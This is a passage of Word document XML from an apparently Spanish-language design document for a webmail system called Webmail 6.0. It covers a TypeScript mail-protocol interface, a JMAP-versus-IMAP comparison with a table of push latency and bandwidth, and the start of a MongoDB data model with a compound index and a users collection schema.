        <w:t xml:space="preserve">listFolders</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Folder[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(folderId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range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UidRange)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EmailHeader[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchBody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(uid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EmailBody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">setFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(uid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flags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sendMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> OutgoingMessage)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startNotifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(callback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotificationCallback)</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syncIncremental</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SyncToken)</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SyncResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La implementación IMAP usa imapflow como cliente, mientras que la implementación JMAP usa peticiones HTTP/JSON sobre el endpoint JMAP del servidor. El Protocol Manager detecta las capacidades del servidor durante la fase de discovery post-login y selecciona la implementación apropiada. Para servidores que soportan ambos protocolos (Stalwart, Cyrus, Apache James), se prefiere JMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[71]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="X46741584758c69d962bc3072b242c072993505b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4.2 JMAP para Servidores Compatibles — 3-5x Sync Más Rápido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JMAP (RFC 8620 core, RFC 8621 mail) es un estándar IETF desarrollado por Fastmail que resuelve las limitaciones fundamentales de IMAP para entornos web modernos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[74]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[84]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cuando el servidor destino soporta JMAP, Webmail 6.0 obtiene mejoras tangibles:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sincronización 3-5x más rápida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: JMAP usa delta sync (solo cambios desde el último estado conocido) y batching de múltiples operaciones en una sola petición, reduciendo drásticamente el número de round-trips necesarios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[31]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reducción de 80-90% en ancho de banda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Al usar JSON sobre HTTPS con IDs inmutables y stateless operations, JMAP elimina la verbosidad de los comandos IMAP y sus respuestas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[31]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Push nativo vía WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: JMAP push (RFC 8887) notifica al cliente en menos de 1 segundo vía WebSocket, eliminando la necesidad de conexiones IMAP IDLE persistentes y sus limitaciones (una carpeta a la vez, sensibilidad a cambios de red)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[31]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[33]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Soporte unificado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: JMAP incluye especificaciones para email (RFC 8621), contactos (RFC 9610), calendarios (en aprobación final), quotas (RFC 9425) y Sieve filtering (RFC 9661), permitiendo consolidar múltiples protocolos en uno solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[71]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Servidores con soporte JMAP verificado incluyen Stalwart Mail Server (production-ready, financiado por NLnet/Comisión Europea)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[105]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[103]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Cyrus IMAP (desde versión 3.2, usado por Fastmail)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[71]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y Apache James (desde versión 3.6.0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[71]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Thunderbird ha comenzado a adoptar JMAP en su versión iOS, con soporte desktop en desarrollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[30]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[45]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="imap-como-fallback-universal"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4.3 IMAP como Fallback Universal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para servidores que no soportan JMAP (la gran mayoría en 2026), IMAP sigue siendo el protocolo de comunicación. imapflow es la única librería IMAP moderna y activamente mantenida para Node.js, con node-imap oficialmente en estado de abandón (último release hace 5+ años)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[107]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La implementación IMAP aprovecha al máximo las extensiones disponibles:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CONDSTORE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(RFC 7162) para sincronización condicional basada en modificaciones de flags sin re-descargar todo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">QRESYNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para re-sincronización rápida después de reconexión, obteniendo solo cambios desde la última sync conocida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">COMPRESS=DEFLATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para reducir ancho de banda en conexiones lentas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP IDLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para notificaciones push en tiempo real (con reinicio periódico según</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxIdleTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[41]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La coexistencia de ambos protocolos posiciona a Webmail 6.0 como compatible con el 100% de servidores IMAP existentes mientras obtiene beneficios significativos en servidores modernos. La transición desde IMAP hacia JMAP será gradual: servidores como Stalwart soportan ambos simultáneamente, y la adopción de JMAP está en aceleración con Thunderbird y múltiples implementaciones server-side maduras</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[32]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[36]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La estrategia dual asegura que Webmail 6.0 no quede obsoleto cuando JMAP alcance adopción masiva, ni excluya a usuarios de servidores IMAP legacy.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1102"/>
        <w:gridCol w:w="1704"/>
        <w:gridCol w:w="1303"/>
        <w:gridCol w:w="1604"/>
        <w:gridCol w:w="2205"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Protocolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Latencia de push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sync inicial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ancho de banda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Soporte de servidores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 1 segundo vía WebSocket</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[31]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3-5x más rápido</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[31]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">80-90% menos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[31]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitado (Stalwart, Cyrus, Apache James)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[71]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP + IDLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inmediato (TCP push)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[63]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estándar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estándar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Universal (99%+ de servidores)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP + polling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">30-60 segundos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estándar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estándar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Universal fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="88" w:name="modelo-de-datos-mongodb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Modelo de Datos MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El diseño del esquema de datos de Webmail 6.0 sigue los principios de modelado orientado a documentos para cargas de trabajo read-heavy, donde la denormalización controlada y los índices compuestos bien diseñados prevalecen sobre la normalización relacional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[148]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. MongoDB resulta particularmente adecuado para el dominio de email porque: las consultas predominantes son lecturas (listar emails, buscar, navegar carpetas), la estructura de un email se mapea naturalmente a un documento JSON anidado, y los índices compuestos permiten resolver las queries más frecuentes en una sola operación index-covered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La estrategia de modelado adopta un enfoque híbrido: se incrustan (embed) datos estables que se consultan conjuntamente con alta frecuencia — como los participantes de un thread o los headers de un email — y se referencian datos que cambian frecuentemente o tienen cardinalidad potencialmente ilimitada, como los adjuntos o los eventos de calendario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[141]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El límite de 16MB por documento de MongoDB se toma como restricción de diseño activa: un email con sus headers y preview cabe cómodamente en un documento, mientras que los adjuntos se almacenan en SeaweedFS con solo su metadata en MongoDB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El índice compuesto más crítico del sistema —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, folderId: 1, date: -1, uid: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— sigue la regla ESR (Equality → Sort → Range), garantizando que la query de listado de emails se resuelva mediante un index scan sin necesidad de in-memory sorts ni document fetches adicionales</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="79" w:name="colección-users-configuración-global"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Configuración Global</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">almacena el perfil de configuración global de cada persona que accede al sistema. Un documento por usuario físico, independientemente de cuántas cuentas de correo gestione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IUser {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Email principal usado para identificación en el sistema */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  primaryEmail</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Nombre de visualización para el usuario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  displayName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URL del avatar (generado por Gravatar o subido por el usuario) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  avatarUrl</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Preferencias de interfaz de usuario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  preferences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
